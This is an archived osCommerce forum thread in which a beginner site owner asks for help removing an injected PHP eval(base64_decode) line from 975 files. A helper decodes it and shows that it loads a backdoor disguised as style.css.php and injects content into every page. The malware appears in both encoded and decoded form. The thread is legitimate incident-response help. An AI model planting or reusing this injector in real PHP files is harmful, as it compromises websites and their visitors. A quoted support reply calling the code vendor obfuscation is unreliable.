Jump to content

Archived

This topic is now archived and is closed to further replies.

craftyscrapper

HELP PLEASE Malicious Code /**/eval(base64_decode('aWYoZn

Recommended Posts

According to my server the code is in 975 of my files, PHP ones. I have tried to delete the codes, however do not know if I am doing it right,and, after about 30 or so wondered if there is another way and whether it will work . I do not have a back up that is not infected. My so called web developer is no where to be found. I am not good with computers and would consider myself a true beginner with codes, development etc. I can not follow instructions on the knowledge base regarding permissions etc (some are 777, some are 644 etc) My oscommerce is v2.2 RCa and I do not understand how to upgrade either. My server has helped as much as they will and can not help me anymore. Here is the code

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9qb3JkYW5hZy9wdWJsaWNfaHRtbC9ibG9nL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9qb3JkYW5hZy9wdWJsaWNfaHRtbC9ibG9nL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3N0eWxl LmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ=='));

I took out the questionmark and shift period so it is hopefully not viral now.

Any help would be apreciated!

Share this post


Link to post
Share on other sites

Read this: eval(base64_decode Hack

 

Visit the link below:

 

How to Secure Your Site


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

Jordana,

 

Your version of osCommerce CAN be very secure providing you make the necessary patches and contribution additions so there is no reason to upgrade at this time. However, since no security was in place you are now hacked and have the tedious task of cleaning the site and then securing it. Since you are a self proclaimed 'newbie' I would suggest perhaps you should find someone to do the necessary cleansing and updating.

 

Once that is complete, I would then suggest you MAKE A CLEAN BACKUP of your website.

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

Hi thanks for the reply as stated I do not have a back up that is not infected. If I just delete all my php files I do not know how to download new ones to my site (a true beginner) I tried the copy and paste first line of the code into the web site and did not get any result and so I emailed them, this is their answer

 

Hi there,

 

It's hard to say for sure just from that snippet, but it looks like you're working with PHP code.

 

One common thing PHP template developers do is 'obfuscate' the code they sell so that it's harder for other developers to edit or reverse engineer. Fair enough - they make a living selling the code they wrote.

 

Since your site uses this code, you only have a few options as far as I can see:

* Contact your original developer and get them to make the changes. I realise this is proving difficult for you.

* Contact the author of that code (likely different from the developer you hired) and see if you can work with them to get the changes you need made.

* Try working around the problem so you don't need whatever is in the obfuscated code.

 

While technically it's possible to reverse-engineer the obfuscated code (it usually goes beyond just base64 encoding), it's not an easy process, and the original developer put it in place to protect his livelihood, so I'm afraid I can't help you there.

 

Best of luck with whatever approach you choose.

 

So now I am even more confused. I had read this before and tried to follow the directions but as stated above this is what I got. It did not help me Is there somewhere I can go and get step by step instructions that are dummy proof.Thanks for your prompt reply.

Share this post


Link to post
Share on other sites

I decoded it:

 

 

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){
 $GLOBALS['sh_no']=1;
 if(file_exists('/home/jordanag/public_html/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php')){
   include_once('/home/jordanag/public_html/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php');
   if(function_exists('gml')&&!function_exists('dgobh')){
     if(!function_exists('gzdecode')){
       function gzdecode($R20FD65E9C7406034FADC682F06732868){
         $R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
         $R60169CD1C47B7A7A85AB44F884635E41=10;
         $R0D54236DA20594EC13FC81B209733931=0;
         if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){
           $R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
           $R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];
           $R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;
         }
         if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){
           $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
         }
         if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){
           $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
         }
         if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){
           $R60169CD1C47B7A7A85AB44F884635E41+=2;
         }
         $RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
         if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){
           $RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;
         }
         return $RC4A5B5E310ED4C323E04D72AFAE39F53;
       }
     }
     function dgobh($RDA3E61414E50AEE968132F03D265E0CF){
       Header('Content-Encoding: none');
       $R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
       if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){
         return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
       }else{
         return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
       }
     }
     ob_start('dgobh');
   }
 }
}

It gives you a location of an evil file:

 

/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php

 

In a Wordpress folder, correct?

:unsure:

 

Maybe the Wordpress part of the site is unsecure (and the osC part may be as well).


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

AHHHH yes, Wordpress HACK is still around. Many sites have fallen to it.

 

 

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

Yes Jim,

My wordpress was also infected, the file you decoded is in my cpanel I assume, should i delete it or change it somehow? Remember I do not have a healthy back up. When I spoke to the person who initially did my wordpress for me she did not know why i had lost all admin privs and suggested I start over, and she never had back ups nor explained how to back up. The reason I say this is I now know how important back ups are and my host went in the "back end" and retrieved my admin controls then I did back it up and now due to bandwith over use I just get blank pages on both my os commerce and wordpress, needless to say I no longer work with the same wordpress developer. OK I vented I am trying to learn what to do myself and further my understanding, so should I delete the file? Thanks Jordana

Share this post


Link to post
Share on other sites

Honestly not meaning to be rude, crude or obnoxious....

:blush:

 

It's a malicious file planted on your site by a hacker.

 

What do you think you should do?

:unsure:


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

THanks for the laugh, i guess it sounds stupid, if i had a broken leg i would know to go to a doctor!!! I am fustrated by all this so i appreciate the laugh. It is a learning process,so I will delete it, i am actually amazed i found it on my cpanel any help is appreciated, thanks Jim.

Share this post


Link to post
Share on other sites

Thanks for your input, I have to go to the staff Xmas party but I will be back to work on this more tomorrow (Saturday) I do appreciate any and all input. thanks Jim and Chris.

Share this post


Link to post
Share on other sites

This clean up script should help to automate removing the malware from all files:

 

blog.sucuri.net/2010/05/simple-cleanup-solution-for-the-latest-wordpress-hack.html

 

It was a common hack on Wordpress spread on many shared hosting providers (godaddy, bluehost, etc).

Share this post


Link to post
Share on other sites

I am cleaning my site,after paying more for bandwith...it came back after warning I was over my bandwith, now I am going through my files and deleting the eval code as well as deleted the infected file that Germ suggested. It seems I am doing some right, because my site is up after it only showed error on specific lines and I went into the file manager in cpanel and corrected the line (I initially did not delete the ?) on line 1. So now I am getting this error message

Warning: file(includes/spiders.txt) [function.file]: failed to open stream: No such file or directory in /home/jordanag/public_html/includes/application_top.php on line 178

 

I have no idea what this means, I may of deleted the spiders.txt file. Can someone explain what a spiders.txt file is and a stream,and what do i do now, remember I am a true beginner, thanks for all the help, I figure I can not make it more than a mess that it is already. Jordana

Oh yeah this one too

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/jordanag/public_html/index.php:2) in /home/jordanag/public_html/includes/functions/sessions.php on line 103

 

THanks

Share this post


Link to post
Share on other sites

×